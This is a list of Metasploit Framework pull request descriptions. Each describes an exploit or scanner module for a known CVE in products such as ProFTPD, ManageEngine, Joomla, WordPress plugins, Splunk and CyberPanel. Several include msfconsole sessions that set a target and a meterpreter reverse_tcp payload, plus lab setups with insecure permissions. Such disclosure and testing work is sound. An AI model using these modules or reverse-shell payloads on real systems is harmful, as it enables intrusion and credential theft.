modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
This is the exploit for the CVE-2015-3306 - Proftpd 1.3.5 mod_copy vulnerability.
The vulnerability requires a Proftpd service with the mod_copy module enabled and a writable website directory to put our PHP payload in.
All testing has been done on a default Kali VM using the installation steps below
<h1>Proftpd installation steps</h1>
```
apt-get install build-essential
mkdir /apps
cd /root
wget "ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz"
tar zxfv proftpd-1.3.5.tar.gz
cd proftpd-1.3.5
./configure --prefix=/apps/proftpd --with-modules=mod_copy
make
make install
cd /apps/proftpd/sbin
./proftpd
```
( If proftpd doesn't start, check that your hostname is correctly set in /etc/hosts )
```
/etc/init.d/apache2 start
chmod 777 /var/www
```
<h1>Exploit</h1>
```
msf > use …
```
=> Proftpd 1.3.5 Mod_Copy Command Execution

modules/exploits/multi/misc/arkeia_agent_exec.rb
This module exploits a remote code execution vulnerability in Western Digital Arkeia 11.0.12 and lower. Both the central backup server as well as all the backup agents on Windows, Linux, *BSD, OSX, etc. are vulnerable.
Vulnerability information has been submitted to the Full Disclosure mailing list, when further references and/or CVE ids are available this will be updated in the module.
How to exploit on Windows:
- Deploy Windows 7 VM
- Download and install http://37.59.169.224/downloadapp/4930/arkeia.11.0.12_master_win7_x86-64.msi
- When asked for an IP address of the Arkeia server, just enter a random internal IP
- Exploit! :)
msf auxiliary(smb_version) > use exploit/multi/misc/arkeia_agent_exec
msf exploit(arkeia_agent_exec) > set RHOST 192.168.2.131
RHOST => 192.168.2.131
msf …
=> Western Digital Arkeia 'ARKFS_EXEC_CMD' <= v11.0.12 RCE

modules/exploits/multi/vnc/vnc_keyboard_exec.rb
This module connects to a VNC service and sends keystrokes to "type" and execute a payload.
(For extra fun watch the commands getting typed in the Windows/Linux GUI:))
Steps to reproduce (Tested on Windows 7 Pro SP1 64-bit):
Download Tightvnc (http://www.tightvnc.com/download.php) or RealVNC (https://www.realvnc.com/download/)
Install and set a password
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.131
RHOST => 192.168.2.131
msf exploit(vnc_keyboard_exec) > set target 0
target => 0
msf exploit(vnc_keyboard_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[*] Started reverse handler …
=> VNC Keyboard Exec

lib/msf/core/exploit/cmdstager.rb, lib/rex/exploitation/cmdstager.rb, lib/rex/exploitation/cmdstager/certutil.rb, spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
This adds the "certutil" command stager, to decode base64 payloads and execute this on Windows environments, as an alternative to the VBS cmdstager.
Original idea and discovery was done by @mattifestation (https://gist.github.com/mattifestation/47f9e8a431f96a266522)
I've tested this on a Windows 7 platform and didn't need the "-----BEGIN CERTIFICATE-----" and "-----END CERTIFICATE-----" tags around the base64 encoded payload to decode to an EXE.
The easiest way to test this is to pick an exploit that uses the VBS command stager and replace the flavor from ":vbs" to ":certutil", like this:
FROM:
execute_cmdstager({:flavor => :vbs, :linemax => 8100})
TO:
execute_cmdstager({:flavor => :certutil, :linemax => 8100})
I've tested this with my recent exploit "vnc_keyboard_exec".
=> Add certutil cmdstager

modules/exploits/windows/misc/manageengine_opmanager_rce.rb
This module exploits ManageEngine 11.5 and lower by abusing a default hardcoded/hiden account to login. After login SQL queries are executed on the PostgreSQL backend to write a WAR payload which gets deployed and executed to provide a shell.
Download ManageEngine OpManager from: https://www.manageengine.com/network-monitoring/29809517/ManageEngine_OpManager_64bit.exe
Run the installer and keep everything default (Tested on a Windows 7 64-bit VM)
Run the exploit module:
msf > use exploit/windows/misc/manageengine_opmanager_rce
msf exploit(manageengine_opmanager_rce) > set RHOST 192.168.2.114
RHOST => 192.168.2.114
msf exploit(manageengine_opmanager_rce) > exploit
[*] Started reverse handler on 192.168.2.123:4444
[*] 192.168.2.114:80 - Access login page
[*] 192.168.2.114:80 - Location is [ …
=> ManageEngine OpManager Remote Code Execution

modules/auxiliary/scanner/portmap/portmap_amp.rb
This module checks for the possibility of Portmap amplification, as recently has been added to the amplification list on https://www.us-cert.gov/ncas/alerts/TA14-017A
To test this deploy an Ubuntu 15.04 server VM and install portmap/rpcbind with the command "apt-get install portmap".
The service should be started right away.
In msfconsole run the following:
msf > use auxiliary/scanner/portmap/portmap_amp
msf auxiliary(portmap_amp) > set RHOST 192.168.2.132
RHOST => 192.168.2.132
msf auxiliary(portmap_amp) > run
[*] Sending Portmap RPC probes to 192.168.2.132->192.168.2.132 (1 hosts)
[+] 192.168.2.132:111 - Vulnerable to Portmap RPC DUMP (Program version: 3) amplification: No packet amplification and a 17x, 644-byte bandwidth amplification
[+] 192.168.2.132:111 - Vulnerable to Portmap RPC …
=> Portmap amplification scanner

modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb
This module exploits ManageEngine 11.5 and lower by abusing an authenticated account (default guest user). After login SQL queries are executed on the PostgreSQL backend to write a JSP payload to disk, which gets executed and provides a shell.
Download ManageEngine EventLog Analuzer from: https://www.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
Run the installer and chose the One-Click installer (Tested on a Windows 7 64-bit VM)
Run the exploit module:
msf exploit(manageengine_opmanager_rce) > use exploit/windows/misc/manageengine_eventlog_analyzer_rce
msf exploit(manageengine_eventlog_analyzer_rce) > set RHOST 192.168.2.114
RHOST => 192.168.2.114
msf exploit(manageengine_eventlog_analyzer_rce) > exploit
[*] Started reverse handler on …
=> ManageEngine EventLog Analyzer Remote Code Execution

modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb
This adds an auxiliary module for ManageEngine ServiceDesk Plus 9.1 build 9110 and lower. The module exploits an unauthenticated path traversal vulnerability.
Further EDB ID and other links will be added to the module when these will be available.
Steps to test:
- I've provided the vulnerable build 9110 for download at http://0x90.nl/ManageEngine_ServiceDesk_Plus_64bit.exe (You can download the fixed version directly from ManageEngine here: https://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_64bit.exe)
- Install on a Windows VM and keep all settings default
- Run the Metasploit module!
msf > use auxiliary/scanner/http/servicedesk_plus_traversal
msf auxiliary(servicedesk_plus_traversal) > set RHOSTS 192.168.2.129
RHOSTS => 192.168.2.129
msf …
=> Add ManageEngine ServiceDesk Plus Path Traversal module

modules/exploits/unix/x11/x11_keyboard_exec.rb
@hmoore-r7 I don't know how the last version was working for me at all (probably the VM I tested it on already had the keyboard registered and stuff and I removed all those requests). I've implemented the correct X11 protocol requests to register the keyboard and everything should be working.
To verify I've tested this on Kali 1.x, Kali 2.x and Ubuntu 15.04.
Please let me know if everything is working correctly for you now.
=> X11 keyboard exec

modules/exploits/windows/http/manage_engine_opmanager_rce.rb
This adds the CVE/URL references to the manage_engine_opmanager_rce exploit module.
=> Add CVE/URL references to module manage_engine_opmanager_rce

modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb
This adds the CVE/URL references to the manageengine_eventlog_analyzer_rce exploit module.
=> Add CVE/URL references to manageengine_eventlog_analyzer_rce

modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
This module exploits Asaf Orpani@Trustwave's Joomla SQLi in versions 3.2 up to 3.4.4. After gaining Administrator access it will create an extra template file with our payload, which provides a shell.
Steps to reproduce:
- Deploy https://github.com/joomla/joomla-cms/releases/download/3.4.4/Joomla_3.4.4-Stable-Full_Package.zip on a linux VM (tested on Ubuntu 15.04)
- Install through the web browser, keep everything default
- Login to the administrator portal at http://<IP>/administrator
- Click on "New Article" -> Title: "Anything" -> Body: "Anything" -> Save (Needed for some actual data in the <prefix>_ucm_history table)
- Make sure that you are still logged in as a Administrator (Super User) when you run the exploit module (As the SQLi will retrieve the admin session)
- Run the exploit! …
=> Add Joomla Content History SQLi RCE exploit module

documentation/modules/auxiliary/scanner/memcached/memcached_amp.md, modules/auxiliary/scanner/memcached/memcached_amp.rb
This module will scan Memcached instances for UDP amplification possibilities using a "stats" request  packet.
All details for reproducing and testing are in the provided documentation.
=> Add Memcached amplification scanner

documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md, modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
List the steps needed to make sure this thing works
=> add exploit module tautulli_shutdown_exec [ CVE-2019-19833 ]

data/wordlists/wp-exploitable-plugins.txt, documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md, modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
This pull request introduces a new exploit module for an unauthenticated file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin (versions before 1.3.79), tracked as CVE-2023-5360. This vulnerability allows for the upload of arbitrary files, leading to potential remote code execution on the affected WordPress site.
- **CVE ID**: CVE-2023-5360
- This vulnerability arises from insufficient checks on uploaded file types and a lack of proper authentication mechanisms in the plugin. It permits unauthenticated users to upload executable PHP files.
- **Name**: `exploit/multi/http/wp_royal_elementor_addons_rce`
- **Targets**: WordPress Royal Elementor Addons and Templates plugin versions < 1.3.79
- **Tested Against**: Version 1.3.78
1. Set up a WordPress instance …
=> Add Exploit Module for WP Royal Elementor Addons Unauthenticated File Upload (CVE-2023-5360)

documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md, modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
fixes #18563 
Hello,
I've developed a Remote Code Execution (RCE) module for Splunk Enterprise. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.
- The exploit targets Splunk Enterprise versions 9.0.x before 9.0.7 and 9.1.x before 9.1.2.
- It requires valid credentials for successful exploitation. Default credentials (admin:changeme) can be used if they haven't been changed.
- The exploit leverages the XSLT transformation process to execute arbitrary code on the vulnerable server.
- The RCE module is functional and can be used to gain remote access to vulnerable Splunk instances.
- However, the version check functionality (`check` method) is not yet implemented. I'm …
=> Added RCE Module for Splunk Enterprise (CVE-2023-46214)

documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md, modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
I am excited to submit a new exploit module for inclusion in the Metasploit Framework targeting a command injection vulnerability in Vinchin Backup & Recovery versions v5.0.*, v6.0.*, v6.7.*, and v7.0.*.
**Module Name**: exploit/linux/http/vinchin_backup_recovery_cmd_inject
This module exploits a command injection vulnerability in Vinchin Backup & Recovery software. It sends a specially crafted HTTP request to the server, resulting in arbitrary command execution under the context of the web server user. After extensive testing, I have determined that the `generic/shell_reverse_tcp` payload is uniquely suited to exploit this vulnerability effectively. Other payloads were tested but did not succeed, making this payload the only currently viable option for successful …
=> Submission of New Exploit Module for Vinchin Backup & Recovery Command Injection

documentation/modules/exploit/linux/http/majordomo_cmd_inject_cve_2023_50917.md, modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb
I have implemented an exploit module for a command injection vulnerability in MajorDoMo, identified as CVE-2023-50917. The vulnerability affects versions prior to 0662e5e. This module also supports scenarios where the target is protected by HTTP Basic Authentication.
- **New Exploit Module**: Added `modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb`.
- **MajorDoMo Instance Check**: Implemented `majordomo?` method for confirming the target's identity based on the MD5 hash of `favicon.ico`.
- **HTTP Basic Authentication Handling**: Added `send_request_with_auth` to manage HTTP Basic Authentication.
- **Updated Check Method**: Enhanced `check` method to validate the presence of `Detector.js` and ascertain MajorDoMo instance status.
- **Module Options**: Included options for …
=> Add CVE-2023-50917: MajorDoMo Command Injection Module

data/wordlists/wp-exploitable-themes.txt, documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md, modules/exploits/multi/http/wp_bricks_builder_rce.rb
This pull request introduces the `wp_bricks_builder_rce` exploit module that targets a known vulnerability in the Bricks Builder plugin for WordPress. The module has been developed following the best practices outlined in the Metasploit Framework documentation and has been thoroughly tested to ensure reliability and effectiveness.
Comprehensive documentation has been included to facilitate understanding and usage of the module by other security professionals and developers.
I believe this module will be a valuable addition to the Metasploit Framework and look forward to any feedback or suggestions for improvement.
Best regards,
Chocapikk
=> Add wp_bricks_builder_rce (CVE-2024-25600)

documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md, modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Greetings Metasploit Team,
I've developed an exploit module targeting a recently discovered vulnerability, CVE-2024-31819, in the AVideo platform's WWBNIndex plugin. This critical Remote Code Execution (RCE) vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable installations of AVideo from v12.4 to v14.2.
Module Details:
- Vulnerability: CVE-2024-31819
- Documentation: Included detailed steps for verification, a breakdown of the exploit's mechanics.
This module aims to provide the Metasploit community with the tools necessary to test their systems against this severe security flaw. I believe it will be a valuable addition to the Metasploit framework, aiding in the ongoing efforts to improve cybersecurity defenses.
I look forward to your feedback and am …
=> Add Exploit Module for CVE-2024-31819 in AVideo WWBNIndex Plugin

data/wordlists/wp-exploitable-plugins.txt, data/wordlists/wp-plugins.txt, documentation/modules/exploit/multi/http/wp_hash_form_rce.md, modules/exploits/multi/http/wp_hash_form_rce.rb
I hope this message finds you well.
I am submitting an exploit module for a vulnerability in the WordPress Hash Form – Drag & Drop Form Builder plugin, identified as CVE-2024-5084. This plugin, despite having just over 1000+ installations, presented an interesting challenge that I wanted to tackle.
The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP scripts, due to missing file type validation in the file_upload_action function. This can potentially lead to remote code execution on the affected WordPress site.
Below are the details of my contribution:
- Exploit Module: Targets versions up to and including 1.1.0 of the Hash Form plugin.
- Platforms: Supports PHP, Unix/Linux, and Windows environments.
- References: CVE-2024-5084 …
=> Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE

documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md, modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
Hello, Metasploit Team,
This PR introduces a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability in SPIP versions up to and including 4.2.12. The vulnerability is detailed in [this blog post](https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/). While I don't have the CVE ID for this issue yet, a patch has already been released.
You can refer to the module documentation for instructions on setting up a vulnerable environment using Docker and from source. 
cc: @jvoisin @laluka
=> SPIP Unauthenticated RCE Exploit

documentation/modules/exploit/multi/http/wp_backup_migration_php_filter.md, modules/exploits/multi/http/wp_backup_migration_php_filter.rb
I've revisited the exploitation technique for CVE-2023-6553 and came up with a simpler method. Instead of the original approach, I've used a shorter PHP filter chain that works with a POST request. The payload is now passed through a POST parameter and gets evaluated directly by the PHP code.
- **Shorter Filter Chain**: The new PHP filter chain evaluates the POST parameter, which simplifies the process and reduces the payload size.
- **Cross-Platform Compatibility**: I’ve added support for both Windows and Linux Meterpreter payloads, not just PHP Meterpreter.
- **Testing**: I’ve tested this in a lab, and it works. One issue to note: the Unix payload doesn’t always work on the first try, but after a few attempts, it goes through. The PHP payload works consistently …
=> CVE-2023-6553: Simplified Exploit with Randomized POST Parameter

documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md, lib/msf/core/exploit/remote/http/spip.rb, modules/exploits/multi/http/spip_bigup_unauth_rce.rb
**Hello Metasploit Team,**
I hope this message finds you well. I am submitting a new module that exploits a Remote Code Execution (RCE) vulnerability found in the BigUp plugin of SPIP. This vulnerability arises from improper handling of multipart form data in file uploads, allowing unauthenticated attackers to execute arbitrary PHP code remotely.
- **SPIP versions 4.2.x before 4.2.16**: This includes all versions from 4.2.0 to 4.2.15.
- **SPIP versions 4.3.x before 4.3.2**: This includes all versions from 4.3.0 to 4.3.1.
- **SPIP versions before 4.1.18**: This includes all versions from 4.0.0 to 4.1.17.
- Supports both PHP in-memory payloads and command shell payloads for Unix, Linux, and Windows platforms.
- The module automatically retrieves the necessary form data from the target …
=> Add SPIP BigUp Plugin Unauthenticated RCE (CVE-2024-8517)

lib/msf/core/exploit/remote/http/wordpress/sqli.rb
This pull request introduces a new mixin, `Msf::Exploit::Remote::HTTP::Wordpress::SQLi`, which provides reusable SQL Injection (SQLi) helper functions specifically designed for WordPress modules in the Metasploit Framework. This idea was proposed by @jvoisin to simplify the development of exploit and auxiliary modules targeting WordPress vulnerabilities by avoiding code duplication and facilitating maintenance.
- **Dynamic Table Prefix Detection**: The mixin includes a function `wordpress_sqli_identify_table_prefix` that dynamically identifies the WordPress database table prefix, whether it's the default `wp_` or a custom prefix. This ensures compatibility with WordPress installations using custom table prefixes.
- **Prefixed Function Names**: All functions in the …
=> Add Msf::Exploit::Remote::HTTP::Wordpress::SQLi

data/wordlists/wp-exploitable-plugins.txt, documentation/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.md, modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
I have developed an **auxiliary module** for the **Unauthenticated SQL Injection Vulnerability** in **WP Fastest Cache <= 1.2.2** (CVE-2023-6063), following the request made by @jvoisin  in the issue raised here: https://github.com/rapid7/metasploit-framework/issues/18534.
This module targets the SQL injection vulnerability found in the WP Fastest Cache plugin, where the injection is performed via the `wordpress_logged_in` cookie, allowing unauthenticated attackers to extract sensitive information, such as usernames and password hashes, from the WordPress database. The setup instructions and usage scenarios are included in the module documentation.
I am looking forward to your feedback and appreciate your consideration of this contribution.
=> CVE-2023-6063: Unauthenticated SQL Injection Vulnerability in WP Fastest Cache <= 1.2.2

documentation/modules/exploit/unix/webapp/byob_unauth_rce.md, modules/exploits/unix/webapp/byob_unauth_rce.rb
I hope this message finds you well. 
I am submitting a new module that exploits two critical vulnerabilities identified in the **BYOB (Build Your Own Botnet) v2.0.0**. These vulnerabilities include an **Unauthenticated Arbitrary File Write (CVE-2024-45256)** and an **Authenticated Command Injection (CVE-2024-45257)**, which allows attackers to bypass authentication and achieve Remote Code Execution (RCE). The latest BYOB version still remains vulnerable as of today.
1. **Arbitrary File Write**: The exploit takes advantage of the file upload feature to overwrite the SQLite database, allowing the creation of a new admin user without authentication.
2. **Command Injection**: After gaining admin privileges, it leverages a command injection vulnerability in the payload …
=> Add BYOB Unauthenticated RCE module (CVE-2024-45256, CVE-2024-45257)

documentation/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.md, modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.rb
I am submitting a new auxiliary module that exploits two unauthenticated SQL injection vulnerabilities in the **LearnPress** WordPress LMS Plugin (version <= 4.2.7). These vulnerabilities allow attackers to perform blind SQL injection via the `c_only_fields` and `c_fields` parameters.
- **Module location**: `auxiliary/scanner/http/wp_learnpress_c_fields_sqli`
- **Vulnerabilities targeted**: 
- **CVE-2024-8522**: SQL injection via the `c_only_fields` parameter.
- **CVE-2024-8529**: SQL injection via the `c_fields` parameter.
- **Docker environment**: Instructions are included for setting up a vulnerable WordPress instance with LearnPress using Docker. This setup allows for easy testing of the exploit.
- **Metasploit module**: The module allows users to select between …
=> Add LearnPress SQLi module (CVE-2024-8522, CVE-2024-8529)

documentation/modules/exploit/multi/http/wp_givewp_rce.md, modules/exploits/multi/http/wp_givewp_rce.rb
I've added a bypass for the Remote Code Execution (RCE) vulnerability in the GiveWP plugin. 
This update includes:
- **Modified the exploit module** to incorporate the bypass, allowing the payload to work on all versions of the GiveWP plugin.
- **Updated the documentation** to reflect the changes and provide clearer instructions.
- **Adjusted the version check logic** to accurately detect vulnerable versions and account for the bypass.
Please review the changes at your convenience. Thank you
=>  Add bypass for GiveWP RCE (CVE-2024-8353) 

documentation/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.md, modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb
This PR introduces a new auxiliary module that exploits an unauthenticated SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress (versions <= 2.8.2). The vulnerability allows attackers to execute SQL queries via the `order` parameter. The module uses `Msf::Exploit::Remote::HTTP::Wordpress::SQLi`, which I integrated for handling SQL injections, though it has not yet been merged into the main framework.
Thank you for your review!
=> Add module for TI WooCommerce Wishlist SQL Injection (CVE-2024-43917)

documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md, modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
Hello Metasploit Team 🎃,
I am submitting a new module that exploits three pre-authenticated RCE vulnerabilities in CyberPanel: **CVE-2024-51378**, **CVE-2024-51567**, and **CVE-2024-51568**, all of which were actively exploited in October 2024 by PSAUX and other groups. This module leverages security flaws in `/dns/getresetstatus` and `/ftp/getresetstatus` for CVE-2024-51378, `/dataBases/upgrademysqlstatus` for CVE-2024-51567, and `/filemanager/upload` for CVE-2024-51568. Each vulnerability allows attackers to bypass authentication by exploiting `secMiddleware` misconfigurations and executing arbitrary commands via shell metacharacters in key parameters.
- **Affected Versions**: 
- **CVE-2024-51378** and **CVE-2024-51567**: Affect CyberPanel versions up to 2.3.6 and the unpatched 2.3.7 …
=> Add CyberPanel Pre-Auth RCE Exploit Module for (CVE-2024-51378 / CVE-2024-51567 / CVE-2024-51568)

data/wordlists/wp-exploitable-plugins.txt, documentation/modules/exploit/multi/http/wp_reallysimplessl_2fa_bypass_rce.md, modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb
I am submitting a new exploit module for the **WordPress Really Simple Security** plugin, addressing an **authentication bypass** vulnerability (CVE-2024-10924). This vulnerability affects versions **9.0.0 to 9.1.1.1** and allows unauthenticated attackers to bypass Two-Factor Authentication (2FA). By exploiting this flaw, an attacker can retrieve the administrator's session cookie directly, enabling full control over the WordPress instance, including the ability to upload and execute arbitrary code.
- **Vulnerable Software**: Really Simple Security plugin
- **Affected Versions**: 9.0.0 to 9.1.1.1
- **Patched Version**: 9.1.2
- **CVE**: CVE-2024-10924
- **Impact**: Allows attackers to bypass 2FA and achieve remote code execution (RCE).
- **Pre-requisite**: 2FA must …
=> WordPress Really Simple Security Plugin Authentication Bypass to RCE (CVE-2024-10924)

data/wordlists/wp-exploitable-plugins.txt, documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md, modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb
I have developed a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.
Over 20,000 active installations
Thank you for your consideration.
=> Add exploit module for CVE-2024-8856 - WP Time Capsule RCE

documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md, modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
**Hey Metasploit team,**
It's been a while since my last submission! Always a pleasure to contribute. I'm submitting a new exploit for **CVE-2025-32432** targeting **Craft CMS**.
This exploit takes advantage of an unauthenticated RCE vulnerability in **Craft CMS versions 3.x, 4.x, and 5.x < 5.6.17**. The attack is possible via the image transform endpoint, which allows the injection of a PHP Meterpreter payload into the Craft session. The payload is then triggered through the `generate-transform` endpoint using the Yii behavior gadget chain.
---
**Steps to verify this module:**
**Additional Information:**
- **ASSET_ID** must be correctly configured for older versions of **Craft CMS (3.x)**.
- For **Craft CMS 5.x and 4.x**, this isn't necessary, but ensure you follow the version …
=> Add new exploit for CVE-2025-32432: Craft CMS Preauth RCE

data/wordlists/wp-exploitable-plugins.txt, documentation/modules/exploit/multi/http/wp_user_registration_membership_escalation.md, modules/exploits/multi/http/wp_user_registration_membership_escalation.rb
This change adds a new module, `exploit/multi/http/wp_user_registration_membership_escalation.rb`, which targets **CVE-2025-2563** in the WordPress **User Registration & Membership** plugin (Free < 4.1.2, Pro < 5.1.2). When the **Membership** Addon is enabled, the plugin fails to enforce role restrictions on its unauthenticated AJAX endpoint, allowing anyone to register a new account and assign it the `administrator` role.
- `RHOSTS` to the target IP or hostname
- `TARGETURI` to the WordPress base path (default `/`)
- (Optional) `WP_USER`, `WP_PASS`, `WP_EMAIL` for the new admin account
You should see output indicating an administrator user was created:
```
[+] Administrator created: <username>:<password>
```
* Browse to `/wp-login.php` or **/login/**
* Log in with …
=> Add Unauthenticated privesc for WP User Registration & Membership plugin (CVE-2025-2563)

documentation/modules/exploit/multi/http/invision_customcss_rce.md, modules/exploits/multi/http/invision_customcss_rce.rb
Hello Metasploit team,
This pull request adds a new exploit module for Invision Community versions up to and including 5.0.6, which is vulnerable to a remote-code injection in the theme editor’s `customCss` endpoint (CVE-2025-47916). The module leverages the malformed `{expression="…"}` construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.
**Implements**
* `exploit/multi/http/invision_customcss_rce.rb`
* `check` method that fetches `/admin/install/eula.txt` and parses the IPS version
* Payload wrapper using `phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)`
* Support for PHP meterpreter in-memory payloads (ARCH\_PHP) and system commands (ARCH\_CMD)
* Module metadata: …
=> Add Invision Community 5.0.6 customCss RCE (CVE-2025-47916)

documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md, modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
This change extends the existing SureTriggers/OttoKit Metasploit module by adding support for **CVE-2025-27007** alongside the already implemented **CVE-2025-3102** flow. Rather than splitting into two modules, both authorization bypass vulnerabilities are handled in one combined exploit since they share common endpoints and can be chained.
=> Add CVE-2025-27007 in existing `exploit(multi/http/wp_suretriggers_auth_bypass)` module

documentation/modules/auxiliary/gather/wp_photo_gallery_sqli.md, modules/auxiliary/gather/wp_photo_gallery_sqli.rb
Hello Metasploit team,
This PR adds support for CVE-2022-0169, an unauthenticated SQL injection in the Photo Gallery by 10Web plugin (≤ 1.6.0). The vulnerability resides in the `bwg_frontend_data` AJAX action, specifically the `bwg_tag_id_bwg_thumbnails_0[]` parameter. By injecting a crafted UNION SELECT payload with 23 columns, placing our payload expression in the 8ᵉ column, we can extract `user_login: user_pass` hashes from the `wp_users` table. The module leverages `create_sqli` (MySQLi) and Metasploit's built-in `wordpress_sqli_get_users_credentials` to automate detection, exploitation, and credential dumping.
cc: @X3RX3SSec
=> WP Photo Gallery by 10Web Unauthenticated SQLi (CVE-2022-0169)

documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md, modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
I'm submitting a module for an **unauthenticated remote code execution** vulnerability in **ICTBroadcast**.
The vulnerability is simple: `/login.php` issues a session cookie, and the server-side code **evaluates certain cookie keys using backticks**. This allows command injection directly inside the cookie, no authentication needed.
* Discovered: **2025-03-19**
* CVE: **pending via VulnCheck**, no assignment yet because the vendor never responded
* I've reached out multiple times the vendor, **no answer**
* As of today, **I have no idea whether it's been patched**
I'm not waiting anymore. Since the vendor didn't engage, I'm releasing the module so people can at least detect and mitigate the issue.
Let me know if anything needs to change.
=> Add ICTBroadcast Unauthenticated Remote Code Execution (CVE-2025-2611)

documentation/modules/exploit/linux/http/aitemi_m300_time_rce.md, modules/exploits/linux/http/aitemi_m300_time_rce.rb
This new module exploits CVE-2025-34152 in the Shenzhen Aitemi M300 MT02 by abusing the `time_conf` endpoint to run arbitrary commands as root without triggering a reboot or altering network settings. It delivers a reliable RCE vector while keeping the HTTP interface fully operational.
=> Add unauthenticated RCE on Shenzhen Aitemi M300 MT02 (CVE-2025-34152)
